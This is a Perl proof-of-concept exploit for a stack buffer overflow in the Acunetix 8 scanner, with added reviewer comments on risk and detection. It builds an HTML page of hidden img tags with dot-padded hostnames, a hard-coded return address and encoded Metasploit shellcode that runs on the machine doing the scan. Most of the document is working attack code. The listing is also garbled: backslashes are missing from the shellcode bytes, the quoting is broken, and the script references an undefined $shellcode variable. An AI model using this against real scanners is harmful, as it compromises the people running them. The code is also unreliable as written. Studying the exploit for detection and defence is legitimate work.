
Acunetix 8 Stack Buffer Overflow

Posted on 25 April 2014

# Exploit Title: Acunetix Stack Based overflow
# Date: 24/04/14
# Exploit Author: Danor Cohen (An7i) - http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html
# Vendor Homepage: http://www.acunetix.com/
# Software Link: http://www.acunetix.com/vulnerability-scanner/download/
# Version: 8 build 20120704
# Tested on: XP
#
# http://www.reddit.com/r/netsec/comments/23tbn6/pwn_the_n00bs_acunetix_0day/
#
# This proof of concept generates an HTML file; per the author, when that file
# is scanned with Acunetix, the embedded shellcode runs on the scanning host.
#
# NOTE(review): the party at risk is the machine running the scanner, not the
# site being scanned. Content fetched by a scanner is untrusted input to the
# scanner itself, so the scanner belongs in an isolated, low-privilege,
# disposable environment. The header above names build 20120704 as affected;
# check the installed build against the vendor's advisory.
#
# NOTE(review): detection. Every tag written below is an invisible <img>
# (opacity 0) whose src host is padded with a run of about 190 consecutive
# dots. Consecutive dots are empty DNS labels and never occur in a valid
# hostname, and the last tag's host is also longer than the 253-character
# DNS name limit, so content inspection can flag both properties.
#
# NOTE(review): this copy of the listing was flattened by the page it came
# from and is not valid Perl as printed (for example, the double quotes inside
# $IMGheader1 end the string early). The code is kept exactly as found.

# Output file name and the fixed HTML wrapper around the generated tags.
my $file= "index.html";
my $HTMLHeader1 = "<html> ";
my $HTMLHeader2 = " </html>";

# Opening and closing halves of each <img> tag; a host name goes between them.
my $IMGheader1 = "<img style="opacity:0.0;filter:alpha(opacity=0);" src=http://";
my $IMGheader2 = "><br> ";

# Five filler host names, each later padded with $GeneralDotPadding.
# Presumably named to resemble scanner options; see the author's write-up.
my $DomainName1 = "XSS";
my $DomainName2 = "CSRF";
my $DomainName3 = "DeepScan";
my $DomainName4 = "NetworkScan";
my $DomainName5 = "DenialOfService";
my $GeneralDotPadding = "." x 190;

# The sixth host name: padded with dots to exactly 202 characters, followed by
# 66 filler bytes, a 4-byte value, 4 more filler bytes and a 4-byte overwrite.
my $ExploitDomain = "SQLInjection";
my $DotPadding = "." x (202-length($ExploitDomain));
my $Padding1 = "A"x66;
my $Padding2 = "B"x4;
my $FlowCorrector = "500f"; #0x66303035 : readable memory location for fixing the flow
# NOTE(review): a hard-coded module address presumes a fixed load address;
# presumably specific to the XP test system named in the header - confirm.
my $EIPOverWrite = "]Qy~"; #0x7e79515d (JMP ESP from SXS.DLL).

# windows/exec - 461 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# VERBOSE=false, PrependMigrate=false, EXITFUNC=thread,
# CMD=calc.exe
# Per the generator banner above, this payload only launches calc.exe.
my $shellcode2 =
"x54x59x49x49x49x49x49x49x49x49x49x49x51x5a" .
"x56x54x58x33x30x56x58x34x41x50x30x41x33x48" .
"x48x30x41x30x30x41x42x41x41x42x54x41x41x51" .
"x32x41x42x32x42x42x30x42x42x58x50x38x41x43" .
"x4ax4ax49x4bx4cx5ax48x4bx39x33x30x45x50x53" .
"x30x33x50x4cx49x4ax45x46x51x48x52x52x44x4c" .
"x4bx36x32x50x30x4cx4bx51x42x34x4cx4cx4bx51" .
"x42x35x44x4cx4bx52x52x37x58x54x4fx48x37x51" .
"x5ax57x56x50x31x4bx4fx46x51x4fx30x4ex4cx37" .
"x4cx45x31x33x4cx45x52x36x4cx47x50x59x51x58" .
"x4fx54x4dx53x31x49x57x4dx32x4cx30x50x52x46" .
"x37x4cx4bx31x42x44x50x4cx4bx30x42x57x4cx45" .
"x51x4ex30x4cx4bx57x30x34x38x4bx35x59x50x42" .
"x54x31x5ax53x31x48x50x36x30x4cx4bx37x38x52" .
"x38x4cx4bx46x38x51x30x43x31x49x43x4ax43x47" .
"x4cx47x39x4cx4bx56x54x4cx4bx45x51x48x56x36" .
"x51x4bx4fx56x51x39x50x4ex4cx39x51x38x4fx54" .
"x4dx43x31x49x57x56x58x4bx50x43x45x4ax54x35" .
"x53x53x4dx4bx48x57x4bx43x4dx57x54x34x35x5a" .
"x42x31x48x4cx4bx56x38x37x54x33x31x48x53x32" .
"x46x4cx4bx34x4cx50x4bx4cx4bx56x38x35x4cx43" .
"x31x58x53x4cx4bx43x34x4cx4bx43x31x4ex30x4b" .
"x39x51x54x31x34x56x44x51x4bx51x4bx43x51x36" .
"x39x51x4ax30x51x4bx4fx4bx50x50x58x51x4fx30" .
"x5ax4cx4bx54x52x4ax4bx4bx36x31x4dx33x5ax53" .
"x31x4cx4dx4bx35x4fx49x55x50x35x50x35x50x46" .
"x30x42x48x36x51x4cx4bx32x4fx4bx37x4bx4fx58" .
"x55x4fx4bx4bx50x45x4dx36x4ax34x4ax43x58x4e" .
"x46x4dx45x4fx4dx4dx4dx4bx4fx39x45x57x4cx43" .
"x36x43x4cx44x4ax4dx50x4bx4bx4dx30x42x55x34" .
"x45x4fx4bx30x47x54x53x34x32x42x4fx52x4ax33" .
"x30x51x43x4bx4fx59x45x45x33x33x51x52x4cx35" .
"x33x46x4ex35x35x53x48x52x45x45x50x41x41";

# Assemble the five filler tags: tag opening, name, 190 dots, tag closing.
my $FinalDomainName1 = $IMGheader1.$DomainName1.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName2 = $IMGheader1.$DomainName2.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName3 = $IMGheader1.$DomainName3.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName4 = $IMGheader1.$DomainName4.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName5 = $IMGheader1.$DomainName5.$GeneralDotPadding.$IMGheader2;

# Assemble the sixth tag from the pieces declared above, in layout order.
my $FinalExploitDomain = $IMGheader1.$ExploitDomain.$DotPadding.$Padding1.$FlowCorrector.$Padding2.$EIPOverWrite.$shellcode.$IMGheader2;

# Write the wrapper and all six tags to $file.
# NOTE(review): two-argument open on an undeclared handle, with no check on
# open, print or close; the message below is printed whether or not the file
# was actually written.
open($FILE,">$file");
print $FILE $HTMLHeader1.$FinalDomainName1.$FinalDomainName2.$FinalDomainName3.$FinalDomainName4.$FinalDomainName5.$FinalExploitDomain.$HTMLHeader2;
close($FILE);
print "Acunetix Killer File Created successfully ";

 
